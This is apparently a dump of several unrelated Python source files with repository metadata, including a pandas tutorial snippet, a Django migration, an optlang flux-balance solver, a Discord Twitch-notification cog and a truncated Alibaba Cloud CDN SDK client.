#df[(df['Hair']=="Black") & (df["Sex"]=="Male")]
# or
df.query("Hair == 'Black' & Sex =='Male'")
#WAP to Filter for those who have brown eye or black hair
#Ans:
z = df[(df['Hair']=="Black") | (df["Eye"]=="Brown")]
# or
z = df.query("Hair == 'Black' | Eye =='Brown'")
z.head(6)
# Filter for eye color of blue, hazel and green
df[df.Eye.isin(['Blue','Hazel','Green'])].head()
# Select one column
df[["Eye"]].head()
# or
df.Eye.head()
# Select two columns
df[["Eye","Sex"]].head()
# Unique Eye colors
df["Eye"].unique()
# Maximum of the "Freq" column
df.Freq.max()
# Call functions on multiple columns
import numpy as np
pd.DataFrame({'Max_freq': [df.Freq.max()], 'Min_freq': [df.Freq.min()], 'Std_freq': [np.std(df.Freq)]})
# Maximum Frequency by Sex
df.groupby("Sex").agg({"Freq":"max"})
#Display max Freq by color
df.groupby("Eye").agg({"Freq":"max"})
# Count by Eye color and Sex
df.groupby(["Eye","Sex"]).agg({"Freq":"count"}).rename(columns={"Freq":"Count"})
# Call functions for grouping
df.assign(Gt50 = (df.Freq > 50)).groupby("Gt50").agg({"Gt50":"count"}).rename(columns ={"Gt50":"Count"})
# Do the analysis on selected rows only
pd.DataFrame({'Max_freq': [df[0:10].Freq.max()], 'Min_freq': [df[0:10].Freq.min()], 'Std_freq': [np.std(df[0:10].Freq)]})
# Remove a column
df.drop('Unnamed: 0', 1).head()
# Return the first occurance
df.query("Eye == 'Blue'")[:1]
# Return the last occurance
df.query("Eye == 'Blue'")[-1:]
# Return a count
df[df.Eye.isin(['Blue','Hazel']) & (df.Sex=="Male")].shape[0]
# Count for each group
df[df.Eye.isin(['Blue','Hazel']) & (df.Sex=="Male")].groupby(["Eye","Sex"]).agg({"Freq":"count"}).rename(columns={"Freq":"Count"})
# Order in ascending order
df.sort_values(by='Freq').tail(6)
# Order in descending order
df.sort_values(by='Freq', ascending = False).tail(6)
# "Freq" in descending and "Eye" in ascending
df.sort_values(by=['Freq','Eye'], ascending = [False,True]).tail(6)
# Rename columns
df.rename(columns = {"Freq":"Frequency","Eye":"Eye_Color"}).tail()
# Unique rows
df[["Eye","Sex"]].drop_duplicates()
# Create new column
df.assign(Eye_Hair =df.Eye + df.Hair)[["Eye","Hair","Eye_Hair"]].head()
| [
"vishalbabu.in@gmail.com"
] | vishalbabu.in@gmail.com |
4de23b31d356ffaea7b2fdcd2e520c3510ebcf5a | a4423a4d393181daf8cd7d5d1426f6b0349a75e8 | /SGR_database/database/migrations/0014_auto_20210715_0518.py | 7dfde0fab8f5f910cffe944866dd4f773f121618 | [] | no_license | CharlieWelly/SGR | 73464a9f17b4aa233005eea1331c03a8c64b0646 | feaf123cd3a5a4ac92011ddb9595fa61c086b9a4 | refs/heads/master | 2023-06-15T18:27:12.907551 | 2021-07-15T11:14:29 | 2021-07-15T11:14:29 | 381,625,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | # Generated by Django 3.2.4 on 2021-07-15 05:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('database', '0013_rename_statement_categories_statement_statement_category'),
]
operations = [
migrations.RemoveConstraint(
model_name='statement',
name='unique_statement',
),
migrations.AddConstraint(
model_name='statement',
constraint=models.UniqueConstraint(fields=('statement_category', 'statement_name'), name='unique_statement'),
),
]
| [
"chicuong.tran08@gmail.com"
] | chicuong.tran08@gmail.com |
92d05229bfa88ea1c51868a7605e54193ba9900b | 6ca91984eb1bfaae020072e30ac8ba5b81a538ae | /python_ops/__init__.py | b750bcea97b6b2f7a9b06ee6bad54c794aabbb75 | [] | no_license | nikhilmishra000/tf_utils | 052b3f97715745638901a70bdcde662aa433e10f | 0370320d8d276905cbc564d11d4867bf6c025e98 | refs/heads/master | 2021-01-18T12:21:30.357692 | 2017-03-03T05:38:41 | 2017-03-03T05:38:41 | 68,735,993 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | from .ops import *
from .conv_ops import *
from .causal_conv import *
fc_stack = make_stack(affine)
conv_stack = make_stack(conv)
deconv_stack = make_stack(deconv)
| [
"nikhilmishra000@gmail.com"
] | nikhilmishra000@gmail.com |
147eabb86c23fd8281b4ba09190388f7a3989371 | 549afd4c4c5c9b401a2643210d6a4d75b7aaa308 | /src/optlang_operations.py | 17e0c0f49974128cd21393d536cc7587fb94db62 | [] | no_license | OGalOz/FBA_Learn_Python | ff6c4ab5335b8f0cbfead5dc8da7392429503235 | 2df9b6fd128db8af1f97f6d12e9ab34ec5268a49 | refs/heads/master | 2023-05-27T03:06:27.671342 | 2019-10-07T18:19:34 | 2019-10-07T18:19:34 | 210,938,075 | 0 | 2 | null | 2019-10-03T21:48:04 | 2019-09-25T20:49:44 | Python | UTF-8 | Python | false | false | 2,749 | py | # In this file we make use of optlang
# More info here: https://optlang.readthedocs.io/en/latest/
from optlang import Model, Variable, Constraint, Objective
# You can declare the symbolic variables here with upper and lower bounds:
'''
x1 = Variable('x1', lb=0, ub = 100)
'''
#S is the stoichiomatrix as passed in by numpy
# objective function is the last variable (v)
# upperbound needs to be an int
# Constraints is as long as the amount of compounds
# flux_bounds is as long as the amount of reactions. It is a d2_list
# flux_bounds = [[lower bounds],[upper bounds]]
def stoichiomatrix_solution(S, flux_bounds, objective_index, objective_direction):
#We make a variable 'v-(index)' for each reaction (column) in the matrix:
variables = make_variables(S, flux_bounds)
constraints = make_constraints(S, variables)
obj = make_objective(objective_index, objective_direction, variables)
model= Model(name='Stoichiomatrix')
model.objective = obj
model.add(constraints)
status = model.optimize()
return [status, model]
# This function makes the variables
def make_variables(S, flux_bounds):
variables = []
row_1 = S[0]
for i in range(len(row_1)):
v = Variable('v-' + str(i+1), lb = flux_bounds[0][i], ub = flux_bounds[1][i])
variables.append(v)
print(variables)
return variables
def make_constraints(S, variables):
#Creating the constraints, one per compound:
constraints = []
for row in S:
constraint_sum = 0
for i in range(len(row)):
constraint_sum += row[i]*variables[i]
c = Constraint(constraint_sum, lb=0, ub =0)
constraints.append(c)
return constraints
def make_objective(objective_index, objective_direction, variables):
#The objective is just to either Maximize or Minimize a Variable.
obj_var = variables[objective_index]
print("Objective variable name: " + obj_var.name)
obj = Objective(variables[objective_index], direction = objective_direction)
return obj
def model_print(model):
print("status:", model.status)
#print("objective variable name: " + model.objective.name)
print("objective value:", model.objective.value)
print("----------")
print(model.variables.items())
for var_name, var in model.variables.items():
print(var_name, "=", var.primal)
def make_fluxes(model):
#fluxes holds the names and their values, then we sort by that and make the fluxes array
fluxes = []
for var_name, var in model.variables.items():
fluxes.append([int(var_name[2:]),var.primal])
fluxes.sort(key = lambda fluxes: fluxes[0])
flux_array = []
for flux in fluxes:
flux_array.append(flux[1])
return flux_array
| [
"ogaloz@lbl.gov"
] | ogaloz@lbl.gov |
eb86c5d2bcdc85721b23e67fb5747812f0c969e5 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/providerhub/v20201120/get_skus_nested_resource_type_first.py | 48f43b29f82376eb8e0e141895212a4bf923acac | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,018 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetSkusNestedResourceTypeFirstResult',
'AwaitableGetSkusNestedResourceTypeFirstResult',
'get_skus_nested_resource_type_first',
]
@pulumi.output_type
class GetSkusNestedResourceTypeFirstResult:
def __init__(__self__, id=None, name=None, properties=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.SkuResourceResponseProperties':
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetSkusNestedResourceTypeFirstResult(GetSkusNestedResourceTypeFirstResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSkusNestedResourceTypeFirstResult(
id=self.id,
name=self.name,
properties=self.properties,
type=self.type)
def get_skus_nested_resource_type_first(nested_resource_type_first: Optional[str] = None,
provider_namespace: Optional[str] = None,
resource_type: Optional[str] = None,
sku: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSkusNestedResourceTypeFirstResult:
"""
Use this data source to access information about an existing resource.
:param str nested_resource_type_first: The first child resource type.
:param str provider_namespace: The name of the resource provider hosted within ProviderHub.
:param str resource_type: The resource type.
:param str sku: The SKU.
"""
__args__ = dict()
__args__['nestedResourceTypeFirst'] = nested_resource_type_first
__args__['providerNamespace'] = provider_namespace
__args__['resourceType'] = resource_type
__args__['sku'] = sku
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:providerhub/v20201120:getSkusNestedResourceTypeFirst', __args__, opts=opts, typ=GetSkusNestedResourceTypeFirstResult).value
return AwaitableGetSkusNestedResourceTypeFirstResult(
id=__ret__.id,
name=__ret__.name,
properties=__ret__.properties,
type=__ret__.type)
| [
"noreply@github.com"
] | noreply@github.com |
c909c27dee1ebaf63d9a85b7a5f256163a57af3d | 80e80d222068f26773b5a866d4244ec215227bf2 | /cogs/twitch.py | ee9f751519ff13013e23e8ba336aa9b69ded0b29 | [
"MIT"
] | permissive | coma3009/harin | 399958aea42b37b04c2e259f88a4624ed5c8a1ad | b0fb198a5928b05c032d017e3f6998a978c9b92e | refs/heads/master | 2023-09-03T02:30:45.241978 | 2021-11-22T07:19:04 | 2021-11-22T07:19:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,966 | py | import asyncio
import json
import os
import time
import traceback
import aiohttp
import aiosqlite
import discord
import discordSuperUtils
import requests
from PycordPaginator import Paginator
from discord.ext import commands
from typing import List
from discord_components import Select, SelectOption, Button
from dotenv import load_dotenv
load_dotenv(verbose=True)
def mTwitchOauth2():
    """Fetch a Twitch app access token via the OAuth2 client-credentials flow.

    Uses ``TWITCH_CLIENT_ID`` / ``twitch_client_secret`` from the environment.

    Returns:
        str: the Helix API app access token.

    Raises:
        RuntimeError: if the token request fails or the response has no token.
    """
    token_url = (
        "https://id.twitch.tv/oauth2/token?client_id="
        + os.getenv('TWITCH_CLIENT_ID')
        + "&client_secret=" + os.getenv('twitch_client_secret')
        + "&grant_type=client_credentials"
    )
    try:
        response = requests.post(token_url, timeout=10)
        # The old code ignored non-2xx responses and then crashed on a missing
        # "access_token" key; surface HTTP errors explicitly instead.
        response.raise_for_status()
    except requests.exceptions.RequestException as exc:
        # Previously errors were printed and execution continued, which crashed
        # later with AttributeError on ''.text. Fail loudly with context.
        raise RuntimeError("Twitch OAuth2 token request failed") from exc
    try:
        access_token = response.json()["access_token"]
    except (ValueError, KeyError) as exc:
        raise RuntimeError("Twitch OAuth2 response did not contain an access token") from exc
    # NOTE(review): no longer printing the raw token — it is a credential and
    # should not end up in logs/stdout.
    return access_token
class twitch(commands.Cog):
    """Twitch go-live notification cog.

    Channels are registered per guild in the ``twitch`` SQLite table
    (columns used here: guild, notice_channel, notice_role, channel).
    ``twitch_loop`` polls the Twitch Helix API every few seconds and posts
    live / offline embeds to the configured notice channel.  ``self.live``
    caches the last known live state per broadcaster login so that each
    transition is announced only once.
    """

    def __init__(self, bot):
        super().__init__()
        self.bot = bot
        # broadcaster_login -> bool: last live state observed by twitch_loop.
        self.live = {}
        self.access_token = mTwitchOauth2()
        self.TwitchManager = discordSuperUtils.TwitchManager(bot, os.getenv('TWITCH_CLIENT_ID'), self.access_token)
        self.bot.loop.create_task(self.twitch_loop())

    @staticmethod
    def add_stream_fields(embed: discord.Embed, stream: dict):
        """Fill *embed* from a Helix /streams payload (a ``get_channel_status`` item)."""
        embed.add_field(
            name="Title",
            value=f"[{stream['title']}](https://twitch.tv/{stream['user_name']})",
            inline=False,
        )
        embed.add_field(name="Game", value=stream["game_name"], inline=False)
        embed.add_field(name="Viewers", value=str(stream["viewer_count"]), inline=False)
        embed.add_field(
            name="Started At", value=stream["started_at"], inline=False
        )  # You can format it.
        embed.add_field(
            name="Mature",
            value="Yes" if stream["is_mature"] else "No",
            inline=False,
        )
        embed.add_field(name="Language", value=stream["language"].upper(), inline=False)
        embed.set_image(url=stream["thumbnail_url"].format(height=248, width=440))

    @staticmethod
    def loop_stream_fields(embed: discord.Embed, stream: dict):
        """Fill *embed* from a Helix /search/channels payload (keys differ from /streams)."""
        embed.add_field(
            name="Title",
            value=f"[{stream['title']}](https://twitch.tv/{stream['broadcaster_login']})",
            inline=False,
        )
        embed.add_field(name="Game", value=stream["game_name"], inline=False)
        embed.add_field(
            name="Started At", value=stream["started_at"], inline=False
        )  # You can format it.
        embed.add_field(name="Language", value=stream["broadcaster_language"].upper(), inline=False)
        embed.set_image(url=stream["thumbnail_url"].format(height=248, width=440))

    @commands.group(name="트위치", invoke_without_command=True)
    async def twitch_(self, ctx):
        """List this guild's registered Twitch channels with their current live status."""
        # NOTE(review): the connection is never closed -- leaks one sqlite
        # handle per invocation; consider `async with aiosqlite.connect(...)`.
        db = await aiosqlite.connect("db/db.sqlite")
        twitch_cur = await db.execute("SELECT * FROM twitch WHERE guild = ?", (ctx.guild.id,))
        premium_cur = await db.execute("SELECT * FROM premium WHERE guild = ?", (ctx.guild.id,))
        twitch_resp = await twitch_cur.fetchall()
        premium_resp = await premium_cur.fetchone()
        if twitch_resp == []:
            return await ctx.reply("등록된 채널이 하나도 없어요! `하린아 트위치 등록 [채널ID]`로 등록하세요!")
        if premium_resp == None:
            # Free plan: single embed listing.
            em = discord.Embed(title="트위치 채널 목록 | 프리플랜(채널 개수 1개 제한)", colour=discord.Colour.random())
            for i in twitch_resp:
                status = await self.TwitchManager.get_channel_status([i[3]])
                stream_info = next(iter(status), None)
                if not stream_info:
                    # BUGFIX: stream_info is None in this branch, so only the stored
                    # login i[3] can be shown (the old code dereferenced
                    # stream_info['user_name'] here and crashed for offline channels).
                    em.add_field(name=f"채널: {i[3]}", value="스트리밍 상태: <:Offline:911928110381953074>오프라인")
                else:
                    em.add_field(
                        name=f"채널: {stream_info['user_name']}({i[3]})", value=f"스트리밍 상태: <:streaming:911928055197478912>스트리밍중 [{stream_info['title']}](https://twitch.tv/{stream_info['user_name']})")
            return await ctx.reply(embed=em)
        # Premium plan: paginated listing.
        formatted_leaderboard = []
        for i in twitch_resp:
            status = await self.TwitchManager.get_channel_status([i[3]])
            stream_info = next(iter(status), None)
            try:
                formatted_leaderboard.append(
                    f"채널: {stream_info['user_name']}({i[3]})\n스트리밍 상태: <:streaming:911928055197478912>스트리밍중 [{stream_info['title']}](https://twitch.tv/{stream_info['user_name']})")
            except Exception:
                # stream_info is None for offline channels -> TypeError above.
                formatted_leaderboard.append(f"채널: {i[3]}\n스트리밍 상태: <:Offline:911928110381953074>오프라인")
        e = Paginator(
            client=self.bot.components_manager,
            embeds=discordSuperUtils.generate_embeds(
                formatted_leaderboard,
                title="트위치 채널 목록 | <:supporter_badge:904937799701110814>프리미엄플랜(채널 개수 5개 제한)",
                fields=3,
                description=f"{ctx.guild}의 트위치 알림 채널 목록",
            ),
            channel=ctx.channel,
            only=ctx.author,
            ctx=ctx,
            use_select=False)
        await e.start()

    @twitch_.command(name="검색")
    async def twitch_lookup(self, ctx, *, channel: str):
        """Look up a single Twitch channel and report whether it is streaming."""
        status = await self.TwitchManager.get_channel_status([channel])
        stream_info = next(iter(status), None)
        if not stream_info:
            await ctx.send(f"<:Offline:911928110381953074> '{channel}'은 오프라인이거나 존재하지않는 채널이에요.")
            return
        embed = discord.Embed(title=f"<:streaming:911928055197478912> '{stream_info['user_name'] or channel}' 은 스트리밍중이에요!", color=0x00FF00)
        self.add_stream_fields(embed, stream_info)
        await ctx.reply(embed=embed)

    @twitch_.command(name="등록")
    async def twitch_add(self, ctx, role: discord.Role, notice_channel: discord.TextChannel, *, channel: str):
        """Register *channel*: alerts go to *notice_channel* and ping *role*."""
        db = await aiosqlite.connect("db/db.sqlite")
        twitch_cur = await db.execute("SELECT * FROM twitch WHERE guild = ?", (ctx.guild.id,))
        premium_cur = await db.execute("SELECT * FROM premium WHERE guild = ?", (ctx.guild.id,))
        twitch_resp = await twitch_cur.fetchall()
        premium_resp = await premium_cur.fetchone()
        if premium_resp == None:
            # Free plan: at most one registered channel.
            if twitch_resp == []:
                await db.execute("INSERT INTO twitch(guild, notice_channel, notice_role, channel) VALUES (?, ?, ?, ?)",
                                 (ctx.guild.id, notice_channel.id, role.id, channel))
                await db.commit()
                await self.TwitchManager.add_channel(ctx.guild, channel)
                return await ctx.reply(f"성공적으로 '{channel}'을 등록했어요.")
            else:
                return await ctx.reply("프리미엄을 사용중이지않아 추가 등록하지못했어요. 추가 등록을 원하시면 프리미엄을 구매해주세요.")
        else:
            # Premium plan: up to five registered channels.
            # BUGFIX: the old "<= 5" check let a sixth channel through even though
            # the user-facing messages promise a five-channel limit.
            if len(twitch_resp) < 5:
                await db.execute("INSERT INTO twitch(guild, notice_channel, notice_role, channel) VALUES (?, ?, ?, ?)",
                                 (ctx.guild.id, notice_channel.id, role.id, channel))
                await db.commit()
                # NOTE(review): unlike the free-plan path, TwitchManager.add_channel is
                # skipped here (was already commented out) -- twitch_loop reads the DB
                # directly, so alerts still work; confirm whether this is intentional.
                #await self.TwitchManager.add_channel(ctx.guild, channel)
                return await ctx.reply(f"성공적으로 '{channel}'을 등록했어요.")
            else:
                return await ctx.reply("앗! 등록된 채널 개수가 5개여서 등록하지 못했어요..😥")

    @twitch_.command(name="해제")
    async def twitch_del(self, ctx):
        """Interactively unregister one of this guild's notification channels."""
        db = await aiosqlite.connect("db/db.sqlite")
        twitch_cur = await db.execute("SELECT * FROM twitch WHERE guild = ?", (ctx.guild.id,))
        twitch_resp = await twitch_cur.fetchall()
        if twitch_resp == []:
            return await ctx.reply("등록된 채널이 하나도 없어요! `하린아 트위치 등록 [채널ID]`로 등록하세요!")
        msg = await ctx.send(f"{ctx.author.mention}, 아래의 목록중 알림 해제하고싶은 채널을 선택하세요.",
                             components=[
                                 Select(placeholder="알림 해제 채널 선택",
                                        options=[
                                            SelectOption(label=i[3],
                                                         value=i[3]) for i in twitch_resp
                                        ], )
                             ],
                             )
        try:
            # BUGFIX: without a timeout, wait_for never raises TimeoutError and the
            # handler below was dead code; 60s matches the timeout message shown.
            interaction = await self.bot.wait_for(
                "select_option", check=lambda inter: inter.user.id == ctx.author.id, timeout=60.0
            )
            value = interaction.values[0]
        except asyncio.TimeoutError:
            await msg.edit("시간이 초과되었어요!", components=[])
            return
        ##await self.TwitchManager.remove_channel(ctx.guild, value)
        await db.execute("DELETE FROM twitch WHERE guild = ? AND channel = ?", (ctx.guild.id, value))
        await db.commit()
        await msg.edit("성공적으로 알림해제를 하였어요!", components=[])

    @staticmethod
    async def channel_statues(url, headers):
        """GET *url* with *headers* and return the decoded JSON body."""
        async with aiohttp.ClientSession(headers=headers) as cs2:
            async with cs2.get(url) as res2:
                pr2 = await res2.read()
                sid2 = pr2.decode('utf-8')
                return json.loads(sid2)

    async def twitch_loop(self):
        """Background poller: announce live/offline transitions for every registered channel.

        For each DB row it resolves the canonical display name via /helix/users,
        then matches it against /helix/search/channels results; transitions are
        tracked in ``self.live`` keyed by broadcaster_login.
        """
        await self.bot.wait_until_ready()
        db = await aiosqlite.connect("db/db.sqlite")
        while not self.bot.is_closed():
            await asyncio.sleep(5)
            twitch_cur = await db.execute("SELECT * FROM twitch")
            datas = await twitch_cur.fetchall()
            headers = {'Client-Id': os.getenv("TWITCH_CLIENT_ID"),
                       'Authorization': "Bearer " + self.access_token}
            for i in datas:
                url = "https://api.twitch.tv/helix/users?login=" + i[3]
                # NOTE(review): a fresh ClientSession per channel per tick is wasteful;
                # a single long-lived session would do -- confirm before changing.
                async with aiohttp.ClientSession(headers=headers) as cs2:
                    async with cs2.get(url) as res2:
                        pr2 = await res2.read()
                        sid2 = pr2.decode('utf-8')
                        answer2 = json.loads(sid2)
                try:
                    url2 = "https://api.twitch.tv/helix/search/channels?query=" + i[3]
                    jsons = await self.channel_statues(url2, headers)
                    for j in jsons['data']:
                        if j['display_name'] == answer2['data'][0]['display_name']:
                            if j['is_live']:
                                try:
                                    if self.live[j['broadcaster_login']]:
                                        pass  # Already announced as live.
                                    else:
                                        self.live[j['broadcaster_login']] = True
                                        status = await self.TwitchManager.get_channel_status([j['broadcaster_login']])
                                        stream_info = next(iter(status), None)
                                        embed = discord.Embed(
                                            title=f"<:streaming:911928055197478912> '{j['display_name']}'님이 스트리밍을 시작하였어요!",
                                            color=0x00FF00)
                                        #self.loop_stream_fields(embed, j)
                                        self.add_stream_fields(embed, stream_info)
                                        channel = self.bot.get_channel(i[1])
                                        await channel.send(content=f"<@&{i[2]}>", embed=embed, components=[Button(style=5,
                                                                                                                 url=f"https://twitch.tv/{j['broadcaster_login']}",
                                                                                                                 label=f"{j['display_name']}님의 방송 보러가기",
                                                                                                                 emoji=self.bot.get_emoji(911928055197478912))])
                                # BUGFIX: the old bare "except:" also swallowed
                                # asyncio.CancelledError, preventing task cancellation.
                                # First sighting raises KeyError here and seeds the cache.
                                except Exception:
                                    self.live[j['broadcaster_login']] = False
                            else:
                                try:
                                    if self.live[j['broadcaster_login']]:
                                        embed = discord.Embed(
                                            title=f"<:Offline:911928110381953074> '{j['display_name']}'님이 스트리밍을 종료했어요!",
                                            color=0x00FF00)
                                        embed.add_field(
                                            name="채널 방문하기",
                                            value=f"[{j['display_name']}](https://twitch.tv/{j['broadcaster_login']})",
                                            inline=False,
                                        )
                                        embed.set_image(
                                            url=j["thumbnail_url"].format(height=248, width=440))
                                        channel = self.bot.get_channel(i[1])
                                        await channel.send(embed=embed, components=[Button(style=5,
                                                                                           url=f"https://twitch.tv/{j['broadcaster_login']}",
                                                                                           label=f"{j['display_name']}님의 채널 방문하기")])
                                        self.live[j['broadcaster_login']] = False
                                except Exception:
                                    self.live[j['broadcaster_login']] = False
                except Exception:
                    # Report any per-channel failure to the bot owner instead of
                    # killing the polling task.
                    user = await self.bot.fetch_user(281566165699002379)
                    await user.send(str(traceback.format_exc()))
def setup(bot):
    """discord.py extension entry point: attach the twitch cog to *bot*."""
    bot.add_cog(twitch(bot))
| [
"popop098@naver.com"
] | popop098@naver.com |
c273e5c4afb916b2bfe8fda1dff478b84e299c6e | 27aaadf435779c29012233cb1dacf27bd9dd0d0f | /cdn-20141111/alibabacloud_cdn20141111/client.py | ef23e019ac3566d3e731afcffe814a639e52c28f | [
"Apache-2.0"
] | permissive | aliyun/alibabacloud-python-sdk | afadedb09db5ba6c2bc6b046732b2a6dc215f004 | e02f34e07a7f05e898a492c212598a348d903739 | refs/heads/master | 2023-08-22T20:26:44.695288 | 2023-08-22T12:27:39 | 2023-08-22T12:27:39 | 288,972,087 | 43 | 29 | null | 2022-09-26T09:21:19 | 2020-08-20T10:08:11 | Python | UTF-8 | Python | false | false | 99,229 | py | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from typing import Dict
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_endpoint_util.client import Client as EndpointUtilClient
from alibabacloud_cdn20141111 import models as cdn_20141111_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
    def __init__(
        self,
        config: open_api_models.Config,
    ):
        """Initialize the CDN (API version 2014-11-11) client.

        Regions without a dedicated CDN endpoint are mapped onto the
        ap-southeast-1 endpoint via ``_endpoint_map``; the effective endpoint
        is then resolved by ``get_endpoint``.
        """
        super().__init__(config)
        self._endpoint_rule = 'central'
        # Regions that share the ap-southeast-1 CDN endpoint.
        self._endpoint_map = {
            'ap-northeast-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'ap-south-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'ap-southeast-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'ap-southeast-2': 'cdn.ap-southeast-1.aliyuncs.com',
            'ap-southeast-3': 'cdn.ap-southeast-1.aliyuncs.com',
            'ap-southeast-5': 'cdn.ap-southeast-1.aliyuncs.com',
            'eu-central-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'eu-west-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'me-east-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'us-east-1': 'cdn.ap-southeast-1.aliyuncs.com',
            'us-west-1': 'cdn.ap-southeast-1.aliyuncs.com'
        }
        self.check_config(config)
        self._endpoint = self.get_endpoint('cdn', self._region_id, self._endpoint_rule, self._network, self._suffix, self._endpoint_map, self._endpoint)
def get_endpoint(
self,
product_id: str,
region_id: str,
endpoint_rule: str,
network: str,
suffix: str,
endpoint_map: Dict[str, str],
endpoint: str,
) -> str:
if not UtilClient.empty(endpoint):
return endpoint
if not UtilClient.is_unset(endpoint_map) and not UtilClient.empty(endpoint_map.get(region_id)):
return endpoint_map.get(region_id)
return EndpointUtilClient.get_endpoint_rules(product_id, region_id, endpoint_rule, network, suffix)
def add_cdn_domain_with_options(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.AddCdnDomainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.cdn_type):
query['CdnType'] = request.cdn_type
if not UtilClient.is_unset(request.check_url):
query['CheckUrl'] = request.check_url
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_account):
query['OwnerAccount'] = request.owner_account
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.priorities):
query['Priorities'] = request.priorities
if not UtilClient.is_unset(request.region):
query['Region'] = request.region
if not UtilClient.is_unset(request.resource_group_id):
query['ResourceGroupId'] = request.resource_group_id
if not UtilClient.is_unset(request.scope):
query['Scope'] = request.scope
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.source_port):
query['SourcePort'] = request.source_port
if not UtilClient.is_unset(request.source_type):
query['SourceType'] = request.source_type
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
if not UtilClient.is_unset(request.top_level_domain):
query['TopLevelDomain'] = request.top_level_domain
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='AddCdnDomain',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.AddCdnDomainResponse(),
self.call_api(params, req, runtime)
)
async def add_cdn_domain_with_options_async(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.AddCdnDomainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.cdn_type):
query['CdnType'] = request.cdn_type
if not UtilClient.is_unset(request.check_url):
query['CheckUrl'] = request.check_url
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_account):
query['OwnerAccount'] = request.owner_account
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.priorities):
query['Priorities'] = request.priorities
if not UtilClient.is_unset(request.region):
query['Region'] = request.region
if not UtilClient.is_unset(request.resource_group_id):
query['ResourceGroupId'] = request.resource_group_id
if not UtilClient.is_unset(request.scope):
query['Scope'] = request.scope
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.source_port):
query['SourcePort'] = request.source_port
if not UtilClient.is_unset(request.source_type):
query['SourceType'] = request.source_type
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
if not UtilClient.is_unset(request.top_level_domain):
query['TopLevelDomain'] = request.top_level_domain
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='AddCdnDomain',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.AddCdnDomainResponse(),
await self.call_api_async(params, req, runtime)
)
def add_cdn_domain(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
